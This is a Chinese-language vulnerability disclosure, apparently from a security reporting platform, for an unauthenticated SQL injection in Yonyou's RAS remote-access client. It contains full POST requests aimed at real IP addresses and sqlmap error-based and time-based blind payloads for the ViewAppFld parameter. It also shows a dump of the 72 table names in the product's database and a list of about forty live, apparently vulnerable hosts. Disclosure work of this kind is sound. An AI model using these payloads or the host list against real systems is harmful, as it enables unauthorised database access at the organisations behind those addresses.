### 简要描述: 附40多个案例啊。。 ### 详细说明: 用友软件RAS标准版客户端(远程快速应用接入) 无需登录存在SQL注入。 第一处: ``` POST /server/cmxpagedquery.php?pgid=AppList&SearchFlag=true HTTP/1.1 Content-Length: 136 Content-Type: application/x-www-form-urlencoded Referer: http://116.236.131.194:8080/ Cookie: PHPSESSID=jb7b826hb3p30jf2rdt17mr8n0; RAS_Client_Style=1; g_LanguageID=cn; RAS_Admin_UserInfo_Domain=aa-ecf4369da2f8; temp_DisplayName=tmtgrnvr; temp_Description=%E5%85%81%E8%AE%B8%E7%94%A8%E6%88%B7%E8%BF%9C%E7%A8%8B%E8%AE%BF%E9%97%AE%E6%AD%A4%E8%AE%A1%E7%AE%97%E6%9C%BA%E4%B8%8A%E7%9A%84%E6%96%87%E4%BB%B6%E5%A4%B9; ErrorInfo=%3Cbr+%2F%3E%E9%94%99%E8%AF%AF%E4%BF%A1%E6%81%AF%3A+Parameter+3%3A+%E7%B1%BB%E5%9E%8B%E4%B8%8D%E5%8C%B9%E9%85%8D%E3%80%82%0D%0A+++%3Cbr+%2F%3E%E9%94%99%E8%AF%AF%E6%89%80%E5%9C%A8%E6%96%87%E4%BB%B6%3A+C%3A%5CProgram+Files%5CComexe%5CRasMini%5Crasweb%5CApache2%5Chtdocs%5Csmarty-2.6.19%5CServer%5CCmxUserGroup.php+%3Cbr+%2F%3E%E9%94%99%E8%AF%AF%E6%89%80%E5%9C%A8%E8%A1%8C%E5%8F%B7%3A+386+%E8%A1%8C%3Cbr+%2F%3E...
### 简要描述: 附40多个案例啊。。 ### 详细说明: 用友软件RAS标准版客户端(远程快速应用接入) 无需登录存在SQL注入。 第一处: ``` POST /server/cmxpagedquery.php?pgid=AppList&SearchFlag=true HTTP/1.1 Content-Length: 136 Content-Type: application/x-www-form-urlencoded Referer: http://116.236.131.194:8080/ Cookie: PHPSESSID=jb7b826hb3p30jf2rdt17mr8n0; RAS_Client_Style=1; g_LanguageID=cn; RAS_Admin_UserInfo_Domain=aa-ecf4369da2f8; temp_DisplayName=tmtgrnvr; temp_Description=%E5%85%81%E8%AE%B8%E7%94%A8%E6%88%B7%E8%BF%9C%E7%A8%8B%E8%AE%BF%E9%97%AE%E6%AD%A4%E8%AE%A1%E7%AE%97%E6%9C%BA%E4%B8%8A%E7%9A%84%E6%96%87%E4%BB%B6%E5%A4%B9; ErrorInfo=%3Cbr+%2F%3E%E9%94%99%E8%AF%AF%E4%BF%A1%E6%81%AF%3A+Parameter+3%3A+%E7%B1%BB%E5%9E%8B%E4%B8%8D%E5%8C%B9%E9%85%8D%E3%80%82%0D%0A+++%3Cbr+%2F%3E%E9%94%99%E8%AF%AF%E6%89%80%E5%9C%A8%E6%96%87%E4%BB%B6%3A+C%3A%5CProgram+Files%5CComexe%5CRasMini%5Crasweb%5CApache2%5Chtdocs%5Csmarty-2.6.19%5CServer%5CCmxUserGroup.php+%3Cbr+%2F%3E%E9%94%99%E8%AF%AF%E6%89%80%E5%9C%A8%E8%A1%8C%E5%8F%B7%3A+386+%E8%A1%8C%3Cbr+%2F%3E Host: 116.236.131.194:8080 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: --user-agent "Mozilla/5.0 (Windows NT 5.1; rv:24.0) Gecko/20100101 Firefox/24.0" Accept: */* AppID%5b-1%5d=651&clear=%e6%b8%85%e7%a9%ba&NMFind=%e6%90%9c%e7%b4%a2&pageNo=&sort=DisplayName&sortType=A&ViewAppFld=8&ViewAppValue=1 ``` 参数ViewAppFld和ViewAppValue都存在注入。。 第二处: ``` POST /server/cmxfolder.php?pgid=AppList&SearchFlag=true&t=1433251155 HTTP/1.1 Content-Length: 118 Content-Type: application/x-www-form-urlencoded Referer: http://218.31.33.44:8888/ Cookie: PHPSESSID=jb7b826hb3p30jf2rdt17mr8n0; RAS_Client_Style=1; g_LanguageID=cn; RAS_Admin_UserInfo_Domain=aa-ecf4369da2f8; temp_DisplayName=tmtgrnvr; temp_Description=%E5%85%81%E8%AE%B8%E7%94%A8%E6%88%B7%E8%BF%9C%E7%A8%8B%E8%AE%BF%E9%97%AE%E6%AD%A4%E8%AE%A1%E7%AE%97%E6%9C%BA%E4%B8%8A%E7%9A%84%E6%96%87%E4%BB%B6%E5%A4%B9; ErrorInfo=%3Cbr+%2F%3E%E9%94%99%E8%AF%AF%E4%BF%A1%E6%81%AF%3A+Parameter+3%3A+%E7%B1%BB%E5%9E%8B%E4%B8%8D%E5%8C%B9%E9%85%8D%E3%80%82%0D%0A+++%3Cbr+%2F%3E%E9%94%99%E8%AF%AF%E6%89%80%E5%9C%A8%E6%96%87%E4%BB%B6%3A+C%3A%5CProgram+Files%5CComexe%5CRasMini%5Crasweb%5CApache2%5Chtdocs%5Csmarty-2.6.19%5CServer%5CCmxUserGroup.php+%3Cbr+%2F%3E%E9%94%99%E8%AF%AF%E6%89%80%E5%9C%A8%E8%A1%8C%E5%8F%B7%3A+386+%E8%A1%8C%3Cbr+%2F%3E Host: 218.31.33.44:8888 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36 Accept: */* clear=%e6%b8%85%e7%a9%ba&NMFind=%e6%90%9c%e7%b4%a2&pageNo=&sort=DisplayName&sortType=A&ViewAppFld=1ViewAppValue=1 ``` 参数ViewAppFld和ViewAppValue都存在注入。。 ### 漏洞证明: [<img src="https://images.seebug.org/upload/201506/03161703dcfa29d11a9dbc51737fb59d17755658.jpg" alt="aaaaaaaaaa11111111111111111.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201506/03161703dcfa29d11a9dbc51737fb59d17755658.jpg) [<img src="https://images.seebug.org/upload/201506/0316175031a50184d8021b089629f59d6e1dc46a.jpg" alt="aaaaaaaaaaa22222222222222.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201506/0316175031a50184d8021b089629f59d6e1dc46a.jpg) [<img src="https://images.seebug.org/upload/201506/031618015a5a23627fdb5a89d70b3e8be70e08c9.jpg" alt="aaaaaaaaaa33333333333333.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201506/031618015a5a23627fdb5a89d70b3e8be70e08c9.jpg) [<img src="https://images.seebug.org/upload/201506/031618100f842c91f5a725385c8e25aa57022bf7.jpg" alt="aaaaaaa4444444444444.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201506/031618100f842c91f5a725385c8e25aa57022bf7.jpg) [<img src="https://images.seebug.org/upload/201506/031618187384615d7ce44f9db731bdbd2822e01f.jpg" alt="aaaaaaaaaa55555555555555.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201506/031618187384615d7ce44f9db731bdbd2822e01f.jpg) ``` --- Parameter: ViewAppFld (POST) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: AppID[-1]=651&clear=%e6%b8%85%e7%a9%ba&NMFind=%e6%90%9c%e7%b4%a2&pageNo=&sort=DisplayName&sortType=A&ViewAppFld=8) AND (SELECT 4416 FROM(SELECT COUNT(*),CONCAT(0x716a787871,(SELECT (ELT(4416=4416,1))),0x71766a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (6748=6748&ViewAppValue=1 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: AppID[-1]=651&clear=%e6%b8%85%e7%a9%ba&NMFind=%e6%90%9c%e7%b4%a2&pageNo=&sort=DisplayName&sortType=A&ViewAppFld=8) AND (SELECT * FROM (SELECT(SLEEP(30)))porO) AND (5447=5447&ViewAppValue=1 --- web server operating system: Windows web application technology: PHP 5.2.6, Apache 2.2.9 back-end DBMS: MySQL >= 5.0.0 current database: 'rasdatabase' sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Parameter: ViewAppFld (POST) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: AppID[-1]=651&clear=%e6%b8%85%e7%a9%ba&NMFind=%e6%90%9c%e7%b4%a2&pageNo=&sort=DisplayName&sortType=A&ViewAppFld=8) AND (SELECT 4416 FROM(SELECT COUNT(*),CONCAT(0x716a787871,(SELECT (ELT(4416=4416,1))),0x71766a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (6748=6748&ViewAppValue=1 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: AppID[-1]=651&clear=%e6%b8%85%e7%a9%ba&NMFind=%e6%90%9c%e7%b4%a2&pageNo=&sort=DisplayName&sortType=A&ViewAppFld=8) AND (SELECT * FROM (SELECT(SLEEP(30)))porO) AND (5447=5447&ViewAppValue=1 --- web server operating system: Windows web application technology: PHP 5.2.6, Apache 2.2.9 back-end DBMS: MySQL >= 5.0.0 Database: rasdatabase [72 tables] +---------------------------+ | hbadminrolegroupmembers | | hbadminrolerestrictedorgs | | hbadminroletask | | hbadminroleusermembers | | hbclientgroupapplication | | hbclientgroupprinter | | hbdirectoryapplication | | hborgapplication | | hborglicensepolicy | | hborgpolicy | | hbpolicyvalues | | hbroletask | | hbserverapplication | | hbserverprinterdriver | | hbserverprintinf | | hbserverrole | | hbservertask | | hbtaskaction | | hbtaskcondition | | hbuserapplication | | hbuserdirectory | | hbuserorgs | | hbuserpolicy | | lograsarchi | | lograsconcurrenta | | lograsconcurrentus | | lograsent | | lograssessi | | lograstaskactionhist | | lograstaskhist | | oemuserinfo | | rasactions | | rasadminroles | | rasadmintasks | | rasapplication | | rasbadprinterdriver | | rascfg | | rasclient | | rasclientgroup | | rascompatibilitydriver | | rasconcurrentsession | | rasconditions | | rasconnectionsetting | | rasdatabase | | rasdirectory | | rasdmzserverd | | rasdomain | | rasgroupuser | | rasinfocollectordata | | rasjobs | | rasjobsteps | | raslicenseinfo | | raslicensetoken | | raslicpolicy | | raslockdownpolicies | | rasmonthlyminute | | rasorgs | | rasprinter | | rasprinterdriver | | rasproductk | | rasreqids | | rasroles | | rasrunningservers | | rasselection | | rasserver | | rasstyle | | rastasks | | rasticketing | | rastimedsessio | | rasuser | | rasusermng | | usermachines | +---------------------------+ http://116.236.131.194:8080/ http://221.239.106.90:81/ http://61.161.199.197/ http://180.168.5.162:8080/ http://111.30.26.38:8000/ http://115.231.212.82:8080/ http://58.246.235.50/ http://218.31.33.158:8001/ http://60.10.34.57:8888/ http://218.207.195.169:8888/ http://122.224.243.218:8888/ http://124.172.246.131:81/ http://120.35.19.21:81/ http://222.69.38.12:8080/ http://61.161.182.38:8080/ http://125.93.255.209:8000/ http://223.197.196.73:81/ http://58.221.244.10:8080/ http://112.84.176.254:8000/ http://61.164.84.70:8080/ http://116.228.5.26:8080/ http://218.76.48.74:81/ http://140.207.74.170:81/ http://121.29.222.68:8080/ http://59.53.170.89:81/ http://218.31.33.44:8888/ http://60.190.102.141:8080/ http://60.12.220.103:8000/ http://122.227.192.250:8080/ http://59.37.7.110:8001/ http://222.223.228.247:81/ http://222.69.91.134:81/ http://116.228.113.155/ http://121.33.210.52:8080/ http://116.90.82.78:8000/ http://221.129.245.61:8080/ http://120.71.225.49:8000/ http://110.87.98.18:81/ http://60.29.103.158:8000/ http://120.193.185.187:81/ http://58.20.34.149:8080/ http://222.223.228.249:81/ http://210.22.101.234:8080/ ```
